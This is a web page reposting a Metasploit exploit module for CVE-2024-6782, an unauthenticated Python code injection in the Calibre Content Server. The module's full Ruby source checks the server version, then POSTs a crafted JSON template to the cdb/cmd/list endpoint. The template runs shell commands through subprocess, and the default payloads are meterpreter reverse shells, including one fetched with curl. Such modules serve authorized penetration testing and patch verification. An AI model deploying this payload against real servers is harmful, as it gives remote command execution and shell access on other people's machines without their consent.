Calibre 7.15.0 Python Code Injection exploit

3 months ago 21
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180007 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Calibre Python Code Injection (CVE-2024-6782)', 'Description' => %q{ This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Amos Ng', # Discovery & PoC 'Michael Heinzl', # MSF exploit ], 'References' => [ [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'], [ 'CVE', '2024-6782'] ], 'DisclosureDate' => '2024-07-31', 'Platform' => ['win', 'linux', 'unix'], 'Arch' => [ ARCH_CMD ], 'Payload' => { 'BadChars' => '\\' }, 'Targets' => [ [ 'Windows_Fetch', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL', 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' }, 'Type' => :win_fetch } ], [ 'Linux Command', { 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' } } ], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080) ] ) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError return CheckCode::Unknown end if res && res.code == 200 data = res.body.to_s pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/ version = data.match(pattern) if version[1].nil? return CheckCode::Unknown else vprint_status('Version retrieved: ' + version[1].to_s) end if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0')) return CheckCode::Appears else return CheckCode::Safe end else return CheckCode::Unknown end end def exploit execute_command(payload.encoded) end def execute_command(cmd) print_status('Sending payload...') exec_calibre(cmd) print_status('Exploit finished, check thy shell.') end def exec_calibre(cmd) payload = '['\ '["template"], '\ '"", '\ '"", '\ '"", '\ '1,'\ '"python:def evaluate(a, b):\\n '\ 'import subprocess\\n '\ 'try:\\n '\ "return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\ 'except Exception:\\n '\ "return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\ ']' res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'application/json', 'data' => payload, 'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list') }) if res && res.code == 200 print_good('Command successfully executed, check your shell.') elsif res && res.code == 400 fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.') end end end
Read Entire Article